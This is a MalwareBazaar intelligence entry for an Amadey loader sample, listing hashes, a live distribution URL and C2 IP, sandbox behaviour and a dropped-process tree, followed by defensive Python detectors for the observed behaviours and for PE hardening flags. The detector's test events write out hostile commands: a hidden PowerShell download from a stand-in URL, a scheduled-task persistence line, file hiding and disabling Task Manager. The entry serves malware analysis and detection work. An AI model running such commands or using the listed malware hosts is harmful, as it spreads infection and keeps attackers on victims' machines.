MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 67772e72ea6536254aef5687a6eec2ac0337c81698239e8fbc109b953790be76. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Amadey

Vendor detections: 17

SHA256 hash: 67772e72ea6536254aef5687a6eec2ac0337c81698239e8fbc109b953790be76
SHA3-384 hash: 508bdda156bc61fea06d5db2f7636133196493e529f5c2281eae57589e54682c806c4dc30a9e5bda52f2b9ccca340f9c
SHA1 hash: f82a8c33fa2dbf8fc327be0dfd764660252d1d74
MD5 hash: b140d0e0a9bfb0c0be35c9c605d046c1
humanhash: spaghetti-gee-equal-sodium
File name: file
Signature: Amadey
File size: 1'939'456 bytes
First seen: 2024-06-23 03:48:30 UTC
Last seen: 2024-06-23 04:21:51 UTC
File type: Executable exe
MIME type: application/x-dosexec
imphash: 2eabe9054cad5152567f0699947a2c5b (2'852 x LummaStealer, 1'312 x Stealc, 1'026 x Healer)
ssdeep: 49152:6pu/+DBuLQmTEPEpEw+Lyak4YUjd0hmEQY0eBJ:3/+MsmBpEw+k+WmED
TLSH: T17B95330D1CE01EE8C7A014FA5AC3BBC33866700624DFD12F51516A7BF1B6EB9775A988
TrID: 29.6% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
      22.7% (.EXE) Win16 NE executable (generic) (5038/12/1)
      20.3% (.EXE) Win32 Executable (generic) (4504/4/1)
      9.1% (.EXE) OS/2 Executable (generic) (2029/13)
      9.0% (.EXE) Generic Win/DOS Executable (2002/3)
Reporter: Bitsight
Tags: Amadey exe


Bitsight
url: http://77.91.77.81/soka/random.exe

Intelligence


File Origin
# of uploads: 2
# of downloads: 364
Origin country: US
Vendor Threat Intelligence
Malware family:
ID:
1
File name:
67772e72ea6536254aef5687a6eec2ac0337c81698239e8fbc109b953790be76.exe
Verdict:
Malicious activity
Analysis date:
2024-06-23 03:50:47 UTC
Tags:
amadey botnet stealer loader meta metastealer redline lumma themida remote xworm evasion exela smokeloader vodkagats python djvu ransomware stop raccoonclipper

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Verdict:
Malicious
Score:
81.4%
Tags:
Banker Stealth Dexter
Result
Verdict:
Malware
Maliciousness:

Behaviour
Creating synchronization primitives
Searching for analyzing tools
Searching for the window
Creating a file
Creating a window
Searching for synchronization primitives
Creating a file in the %temp% subdirectories
Creating a process from a recently created file
Creating a process with a hidden window
Connection attempt to an infection source
Enabling autorun by creating a file
Sending an HTTP POST request to an infection source
Verdict:
Suspicious
Threat level:
  5/10
Confidence:
100%
Tags:
anti-vm microsoft_visual_cc packed
Result
Verdict:
MALICIOUS
Details
Windows PE Executable
Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary is suspicious or malicious.
Result
Threat name:
LummaC, Python Stealer, Amadey, Monster
Detection:
malicious
Classification:
troj.spyw.evad
Score:
100 / 100
Signature
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Detected unpacking (changes PE section rights)
Disable Task Manager(disabletaskmgr)
Disables the Windows task manager (taskmgr)
Found malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
PE file contains section with special chars
Potentially malicious time measurement code found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Reads the System eventlog
Sample uses string decryption to hide its real strings
Sigma detected: Powershell downloading file from url shortener site
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
System process connects to network (likely due to code injection or exploit)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal communication platform credentials (via file / registry access)
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected Generic Python Stealer
Yara detected Monster Stealer
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected SmokeLoader
Yara detected XWorm
Yara detected zgRAT
Behaviour
Behavior Graph (ID 1461206; sample: file.exe; start date: 23/06/2024; architecture: WINDOWS; score: 100)

Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 22 other signatures.

Process tree with dropped files, per-process signatures and network contacts, as recovered from the graph ("..." marks path components the graph itself abbreviates; network entries are IP (AS name, country code, country)):

file.exe (the sample)
  drops: C:\Users\user\AppData\Local\...\axplong.exe (PE32); C:\Users\user\...\axplong.exe:Zone.Identifier (ASCII)
  signatures: Detected unpacking (changes PE section rights); Tries to evade debugger and weak emulator (self modifying code); Tries to detect virtualization through RDTSC time measurements; Potentially malicious time measurement code found
  starts axplong.exe
    network: 185.172.128.116 (NADYMSS-AS, RU, Russian Federation); 140.82.121.4 (GITHUB, US, United States); 2 other IPs or domains
    drops: C:\Users\user\AppData\Local\...\googleads.exe (PE32); C:\Users\user\AppData\Local\...\judit.exe (PE32+); C:\Users\user\AppData\...\taskweaker.exe (PE32+); 17 other malicious files
    signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Tries to detect sandboxes and other dynamic analysis tools (window names); 5 other signatures
    starts judit.exe
      drops: C:\Users\user\AppData\...\_quoting_c.pyd (PE32+); C:\Users\user\AppData\...\vcruntime140.dll (PE32+); C:\Users\user\AppData\...\unicodedata.pyd (PE32+); 32 other files (31 malicious)
      signatures: Multi AV Scanner detection for dropped file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      starts stub.exe
        network: 208.95.112.1 (TUT-AS, US, United States); 65.0.21.192 (AMAZON-02, US, United States)
        drops: C:\Users\user\AppData\Local\...\Monster.exe (PE32+); C:\Users\user\AppData\...\system_info.txt (Algol)
        signatures: 2 other signatures
        starts cmd.exe (then conhost.exe, WMIC.exe); cmd.exe (then conhost.exe, tasklist.exe); cmd.exe (then 2 other processes); 7 other processes (then conhost.exe, 6 other processes)
    starts deep.exe
      drops: C:\Users\user\AppData\...\da_protected.exe (PE32)
      signatures: Machine Learning detection for dropped file
      starts da_protected.exe
        network: 195.2.71.70 (VDSINA-AS, RU, Russian Federation)
        drops: C:\Users\user\AppData\Local\Temp\izhfef.exe (PE32+)
        signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 4 other signatures
        starts izhfef.exe
          network: 172.67.198.131 (CLOUDFLARENET, US, United States)
          drops: C:\Users\user\AppData\Local\Temp\setup.exe (PE32+); C:\Users\user\AppData\Local\...\setup[1].exe (PE32+); C:\Users\user\AppData\Local\...\setup[4].exe (PE32+); 3 other malicious files
    starts gold.exe
      signatures: Contains functionality to inject code into remote processes; Writes to foreign memory regions; 2 other signatures
      starts RegAsm.exe
        network: 4.185.27.237 (LEVEL3, US, United States)
        signatures: Found many strings related to Crypto-Wallets (likely being stolen); Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); Tries to harvest and steal browser information (history, passwords, etc)
    starts 7 other processes
      network: 185.215.113.67 (WHOLESALECONNECTIONS, NL, Portugal)
      drops: C:\Users\user\AppData\Local\...\Hkbsse.exe (PE32)
      signatures: Antivirus detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Found many strings related to Crypto-Wallets (likely being stolen); 4 other signatures
      starts cmd.exe
        drops: C:\Users\user\AppData\Local\...\install.bat (ASCII)
        signatures: Suspicious powershell command line found; Uses schtasks.exe or at.exe to add and modify task schedules; Uses attrib.exe to hide files
        starts powershell.exe
          starts Conhost.exe; cmd.exe (then reg.exe, conhost.exe, schtasks.exe, 2 other processes)
            reg.exe signatures: Disable Task Manager(disabletaskmgr); Disables the Windows task manager (taskmgr)
        starts powershell.exe
          drops: C:\Users\user\AppData\Local\Corporation.zip (Zip)
        starts 4 other processes
          network: 67.199.248.11 (GOOGLE-PRIVATE-CLOUD, US, United States); 54.67.42.145 (AMAZON-02, US, United States)
      starts BitLockerToGo.exe
        network: 188.114.96.3 (CLOUDFLARENET, US, European Union)
        signatures: Query firmware table information (likely to detect VMs)
      starts RegAsm.exe
        signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        starts conhost.exe
      starts 4 other processes
        network: 20.42.73.29 (MICROSOFT-CORP-MSN-AS-BLOCK, US, United States)

Hkbsse.exe (started at top level; the file itself is dropped by the "7 other processes" node above)
  drops: C:\Users\user\AppData\Local\Temp\...\1.exe (PE32); C:\Users\user\AppData\Local\...\1[1].exe (PE32)
  starts 1.exe
    signatures: Machine Learning detection for dropped file; Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; 3 other signatures
    injects explorer.exe
      network: 186.4.194.68 (TelconetSA, EC, Ecuador); 212.112.110.243 (AKNET-AS, KG, Kyrgyzstan)
      drops: C:\Users\user\AppData\Roaming\fjebrgc (PE32)
      signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Hides that the sample has been downloaded from the Internet (zone.identifier)

axplong.exe (second instance, started at top level)
  signatures: Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

5 other processes (top level)
  network: 184.28.90.27 (AKAMAI-AS, US, United States); 127.0.0.1 (unknown); 2 other IPs or domains
  starts chrome.exe (network: 142.250.186.130 (GOOGLE, US, United States); 142.250.186.68 (GOOGLE, US, United States); 7 other IPs or domains); WerFault.exe; chrome.exe
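The persistence and evasion chain visible in the graph (cmd.exe dropping install.bat, PowerShell downloading with Invoke-WebRequest, schtasks.exe for a scheduled task, attrib.exe to hide files, reg.exe writing DisableTaskMgr) maps directly onto the Sigma-style signatures listed above. The following is an added example, not MalwareBazaar's code and not any sandbox vendor's actual Sigma rules: plain-Python matchers for those behaviours run over constructed Sysmon-style process-creation events. Every event, path, task name and URL below is invented to mirror the chain in the report; the shortener domain list and the DisableTaskMgr policy key are the only real-world specifics.

```python
"""Added example (not MalwareBazaar's or any vendor's code): simple matchers for
the process-creation behaviours listed in the sandbox report, run over
constructed Sysmon-style events. Events, paths and URLs are invented."""
import re
from dataclasses import dataclass

# Public URL shorteners the "url shortener site" rule keys on (extend as needed).
URL_SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "is.gd", "cutt.ly"}


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    command_line: str
    parent_image: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _host(url: str) -> str:
    m = re.match(r"https?://([^/\s:]+)", url, re.I)
    return m.group(1).lower() if m else ""


def match(ev: ProcEvent) -> list:
    """Return the names of the report behaviours this single event exhibits."""
    hits = []
    img = _basename(ev.image)
    cl = ev.command_line
    cl_l = cl.lower()
    if img in ("powershell.exe", "pwsh.exe"):
        if re.search(r"\b(invoke-webrequest|iwr|wget|curl)\b", cl_l):
            hits.append("Suspicious Invoke-WebRequest Execution")
        urls = re.findall(r"""https?://[^\s'"]+""", cl, re.I)
        if any(_host(u) in URL_SHORTENERS for u in urls):
            hits.append("Powershell downloading file from url shortener site")
    if img in ("cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"):
        # script file under %LOCALAPPDATA%\Temp passed on the command line
        if re.search(r'\\appdata\\local\\temp\\[^\s"]*\.(bat|cmd|ps1|vbs|js)\b', cl_l):
            hits.append("Suspicious Script Execution From Temp Folder")
    if img == "schtasks.exe" and "/create" in cl_l:
        hits.append("Uses schtasks.exe or at.exe to add and modify task schedules")
    if img == "attrib.exe" and re.search(r"(^|\s)\+[hs]\b", cl_l):
        hits.append("Uses attrib.exe to hide files")
    if img == "reg.exe" and re.search(r"\badd\b", cl_l) and "disabletaskmgr" in cl_l:
        hits.append("Disables the Windows task manager (taskmgr)")
    return hits


# Constructed events mirroring the cmd -> powershell -> cmd -> reg/schtasks chain.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Users\user\AppData\Local\Temp\abcd\install.bat"',
              r"C:\Users\user\AppData\Local\Temp\stub.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "Invoke-WebRequest -Uri https://bit.ly/EXAMPLE -OutFile $env:TEMP\\upd.exe"',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /tn Updater /tr "C:\Users\user\AppData\Local\Temp\upd.exe" /sc minute /mo 5 /f',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\attrib.exe",
              r'attrib +h +s "C:\Users\user\AppData\Local\Temp\upd.exe"',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\reg.exe",
              r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f',
              r"C:\Windows\System32\cmd.exe"),
    # two benign events that must not fire
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -NoProfile -Command Get-Process", r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r'cmd.exe /c dir "C:\Users\user\Documents"',
              r"C:\Windows\explorer.exe"),
]


def scan(events) -> dict:
    """Map each behaviour name to the number of events that triggered it."""
    counts = {}
    for ev in events:
        for name in match(ev):
            counts[name] = counts.get(name, 0) + 1
    return counts


def flagged(events) -> list:
    """(image, parent, hits) for every event with at least one hit."""
    return [(_basename(e.image), _basename(e.parent_image), match(e))
            for e in events if match(e)]


if __name__ == "__main__":
    for img, parent, hits in flagged(SAMPLE_EVENTS):
        print(f"{parent} -> {img}: {', '.join(hits)}")
```

On real telemetry the parent-child relationship is what gives these hits their weight: a lone schtasks.exe /create is common, but schtasks.exe, attrib.exe and reg.exe all spawned by a cmd.exe whose own parent is a PowerShell started from a Temp-dropped batch file is the chain the graph shows.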
Threat name:
Win32.Spyware.Lummastealer
Status:
Malicious
First seen:
2024-06-23 03:49:06 UTC
File Type:
PE (Exe)
Extracted files:
1
AV detection:
20 of 24 (83.33%)
Threat level:
  2/5
Verdict:
malicious
Result
Malware family:
Score:
  10/10
Tags:
family:amadey botnet:e76b71 evasion trojan
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Drops file in Windows directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Checks BIOS information in registry
Checks computer location settings
Executes dropped EXE
Identifies Wine through registry keys
Loads dropped DLL
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Amadey
Malware Config
C2 Extraction:
http://77.91.77.81
Unpacked files
SHA256 hash:
b30a1eba5678dd3ea841e4aa62300a74cdcb33690e350dcc1ce9c743c11046d4
MD5 hash:
a904790a18785bfd6fb80683d44d5691
SHA1 hash:
1a4835f1594ab41ba6a6bb4255e4c727beb4fa34
Detections:
win_amadey
SHA256 hash:
67772e72ea6536254aef5687a6eec2ac0337c81698239e8fbc109b953790be76
MD5 hash:
b140d0e0a9bfb0c0be35c9c605d046c1
SHA1 hash:
f82a8c33fa2dbf8fc327be0dfd764660252d1d74
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. These rules are matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps those samples create. Please note that only results from TLP:CLEAR rules are displayed.

Rule name: Amadey
Author: kevoreilly
Description: Amadey Payload
Rule name: maldoc_find_kernel32_base_method_1
Author: Didier Stevens (https://DidierStevens.com)
Rule name: maldoc_getEIP_method_1
Author: Didier Stevens (https://DidierStevens.com)
Rule name: MD5_Constants
Author: phoul (@phoul)
Description: Look for MD5 constants
Rule name: meth_get_eip
Author: Willi Ballenthin
Rule name: vmdetect
Author: nex
Description: Possibly employs anti-virtualization techniques
Rule name: Windows_Generic_Threat_bd24be68
Author: Elastic Security
Rule name: win_amadey_a9f4
Author: Johannes Bader
Description: matches unpacked Amadey samples

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download
Sample: Amadey, Executable exe, 67772e72ea6536254aef5687a6eec2ac0337c81698239e8fbc109b953790be76 (this sample)
Dropped by: Privateloader
Delivery method: Distributed via web download

BLint


The following table provides more information about this file using BLint. BLint is a Binary Linter to check the security properties, and capabilities in executables.

Findings
ID                         Title                                                    Severity
CHECK_AUTHENTICODE         Missing Authenticode                                     high
CHECK_DLL_CHARACTERISTICS  Missing dll Security Characteristics (HIGH_ENTROPY_VA)   high
CHECK_NX                   Missing Non-Executable Memory Protection                 critical
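All three findings come straight out of the PE optional header: NX_COMPAT and HIGH_ENTROPY_VA are bits in DllCharacteristics, and "Missing Authenticode" means the security data directory (index 4) has size zero. The following is an added example, not BLint's own code: a standard-library parser that reports the same three IDs and, going one step beyond the table, also flags a missing DYNAMIC_BASE (ASLR) bit under a hypothetical ID CHECK_DYNAMIC_BASE. The minimal headers that build_test_header() produces are constructed purely to exercise the parser and are not loadable images.

```python
"""Added example (not BLint's code): parse a PE optional header with the
standard library and report BLint-style hardening findings. Headers produced
by build_test_header() are constructed for the demonstration only."""
import struct

# IMAGE_DLLCHARACTERISTICS_* flags from the PE/COFF specification
HIGH_ENTROPY_VA = 0x0020   # 64-bit ASLR entropy; only meaningful for PE32+ images
DYNAMIC_BASE    = 0x0040   # ASLR
NX_COMPAT       = 0x0100   # DEP / non-executable memory
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
SECURITY_DIRECTORY = 4     # IMAGE_DIRECTORY_ENTRY_SECURITY (Authenticode signature)


def pe_header_fields(data: bytes):
    """Return (optional-header magic, DllCharacteristics, security directory size)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20                      # skip signature and 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == PE32_MAGIC:
        dd_off = opt + 96                        # start of the data directories
    elif magic == PE32PLUS_MAGIC:
        dd_off = opt + 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in PE32 and PE32+
    num_dirs = struct.unpack_from("<I", data, dd_off - 4)[0]  # NumberOfRvaAndSizes
    sec_size = 0
    if num_dirs > SECURITY_DIRECTORY:
        _rva, sec_size = struct.unpack_from("<II", data, dd_off + 8 * SECURITY_DIRECTORY)
    return magic, dll_chars, sec_size


def findings(data: bytes) -> list:
    """BLint-style finding IDs for the header in data (CHECK_DYNAMIC_BASE is our own addition)."""
    _magic, chars, sec_size = pe_header_fields(data)
    out = []
    if not chars & NX_COMPAT:
        out.append("CHECK_NX")
    if not chars & HIGH_ENTROPY_VA:
        out.append("CHECK_DLL_CHARACTERISTICS")
    if not chars & DYNAMIC_BASE:
        out.append("CHECK_DYNAMIC_BASE")          # hypothetical ID, not in BLint's table above
    if sec_size == 0:
        out.append("CHECK_AUTHENTICODE")
    return out


def build_test_header(magic: int, dll_chars: int, sec_size: int) -> bytes:
    """Construct a minimal DOS + PE header (no sections) to exercise the parser."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    is32 = magic == PE32_MAGIC
    opt_size = 224 if is32 else 240
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C if is32 else 0x8664, 0, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 70, dll_chars)
    dd_off = 96 if is32 else 112
    struct.pack_into("<I", opt, dd_off - 4, 16)   # NumberOfRvaAndSizes
    if sec_size:
        struct.pack_into("<II", opt, dd_off + 8 * SECURITY_DIRECTORY, 0x1000, sec_size)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            print(path, findings(f.read()))
```

A caveat worth keeping in mind when reading BLint output on malware: a packed or self-modifying sample that is flagged "Missing Non-Executable Memory Protection" is usually not forgetting DEP by accident; the loader changes section rights at runtime (the "Detected unpacking (changes PE section rights)" signature above), so these flags describe the outer stub, not the payload it unpacks.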
